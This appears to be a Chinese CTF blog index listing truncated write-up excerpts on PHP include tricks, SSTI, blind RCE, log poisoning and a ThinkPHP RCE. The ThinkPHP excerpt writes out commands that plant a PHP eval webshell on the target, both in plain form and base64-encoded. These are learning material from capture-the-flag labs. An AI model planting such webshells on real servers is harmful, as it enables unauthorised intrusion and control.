root@wanth3f1ag

0x01前言webEasy_include第一个题目的话就是简单的php代码审计题，include函数包含，用input伪协议去做就可以绕过对参数的flag过滤问题了 Web_IP第二个问题看了一下发现ip那里是可控的，一开始没找到注入点，后面发现是在X-Forwarded-For里的ssti，传入{8*8}有回显64，确实存在ssti，然后传system命令执行就可以了 Web_pop123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657<?phperror_reporting(0);highlight_file(__FILE__);class Start{ public $name; protected $func; public function __destruct() { echo "Welcome to QHCTF 2025,...

第一个flag 用fscan扫一下发现是thinkphp的rce 访问一下网址 扫目录 访问出来还是index.php 直接看漏洞浮现就可以 抓包上传 id可以看到当前的用户信息，然后我们用pwd看一下当前目录 放蚁剑打好一点，往里面写个一句话 1echo "<?php @eval($_POST['cmd']);?>" > /var/www/html 然后ls看一下木马是否成功写入 看到写入了，用蚁剑连一下 但是没连上，是被吃了吗？？？ 穿个phpifo的php文件试一下 1echo "<?php phpinfo();?>" > /var/www/html/test2.php 然后访问test2.php是可以出来的 应该是有什么被过滤了，我们用base64编码传进去试一下 1echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d >...

0x01前言刚好做到一个湘岚杯的题目是跟无回显rce有关的，就写篇文章去深入学习一下这个知识点 在我们做题的时候或者是测试的时候，通常会有命令执行后没有回显的情况，页面不会返回我们执行的结果，而我们也不知道命令是否执行成功，这时候就是讲到我们的无回显RCE了 0x02正文没有回显加上命令执行的话很容易就能想到反弹shell，这也是其中的一个方法之一 反弹shell参考文章...

0x01前言没报名，但是后面发现这个比赛的赛题挺好玩的，就浮现玩一下 0x02赛题大道轮回12345678910111213141516171819202122232425262728293031323334<?phpsession_start();/*跳出轮回的真谛开头是:XNCTF*/show_source(__FILE__);error_reporting(0);if (isset($_GET['sha256']) && isset($_GET['cmd'])) { $sha256 = $_GET['sha256']; $cmd = $_GET['cmd']; if (substr(sha256($sha256), 0, 6) === '647d99') { echo "踏平坎坷成大道，斗罢艰险又出发"; if...

只看了一道题，后面比赛结束了没得浮现环境了做不了了，所以只写了一道题的wp easy_flask 那两个链接没什么用，登录进去后对着url中user参数进行ssti注入就可以 这样就可以看出是存在ssti了 12345678第一步，拿到当前类，也就是用__class__{{"".__class__}}<class 'str'>第二步，拿到基类，这里可以用__base__，也可以用__mro__{{"".__class__.__base__}}<class...

基础知识先讲讲Java语言的几个重要特性 Java语言是面向对象的语言(oop) Java语言是健壮的，Java 的强类型机制、异常处理、垃圾的自动收集等是 Java 程序健壮性的重要保证。 Java语言是跨平台型的语言 Java语言是强类型的语言 Java语言是解释型语言 解释型语言:javascript,PHP,java 编译性语言:C/C++ 什么是解释性语言？就是编译后的代码不能直接被机器执行的，需要解释器去执行 一个 Java...

web-Welcome#请求方法+sha1哈希绕过 打开是405错误，抓包后看到是Method Not Allowed 搜索后发现是请求方式错误，换成POST传参就可以拿到源码了 1234567891011121314<?phperror_reporting(0);if ($_SERVER['REQUEST_METHOD'] !== 'POST') {header("HTTP/1.1 405 Method Not Allowed");exit();} else { if (!isset($_POST['roam1']) || !isset($_POST['roam2'])){ show_source(__FILE__); } else if ($_POST['roam1'] !== $_POST['roam2'] &&...

签到_观己123456789101112131415<?phpif(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ die('error'); }else{ include($file); }}else{ highlight_file(__FILE__);}?> include文件包含，allow_url_include没有开启没有办法用伪协议，我们用日志注入，先看一下服务器版本 对于Ngnix，日志存放路径：/var/log/nginx/access.log 和...

0x01前言做一期函数的知识点积累，方便忘记的时候查阅 0x02正文phpinfo()函数phpinfo() 是一个 PHP 函数，用于输出当前 PHP 环境的详细信息。这包括 PHP 的版本、已加载的扩展、配置信息、服务器信息、环境变量、已定义的常量等。使用 phpinfo() 可以帮助开发者和系统管理员快速了解服务器的 PHP 配置。 eval()函数在 PHP 中，eval() 函数用于将字符串作为 PHP 代码执行。它可以动态地执行代码 基础语法 1eval(string $code): mixed $code：要执行的 PHP 代码字符串。 返回值：如果代码包含返回语句，将返回返回值；如果没有返回值，将返回 null。 示例 12345<?php$expression = '3 + 5';$result = eval("return $expression;");echo $result; // 输出: 8?> file_get_contents()函数file_get_contents() 是 PHP...

36D练手赛+36D杯不知所措.jpg 传入file参数且file参数必须有test 那我们先试一下是get传参还是post传参吧 /?file=test 确定是GET传参了，不过我们传入的参数和php进行拼接了，我本来是试着去读flag的，但是没读出来 试试index看看能不能读到源代码，然后也是成功读到了index.php文件的源码，我们拿去解码一下 123456789101112<?phperror_reporting(0);$file=$_GET['file'];$file=$file.'php';echo $file."<br />";if(preg_match('/test/is',$file)){ include ($file);}else{ echo '$file must has...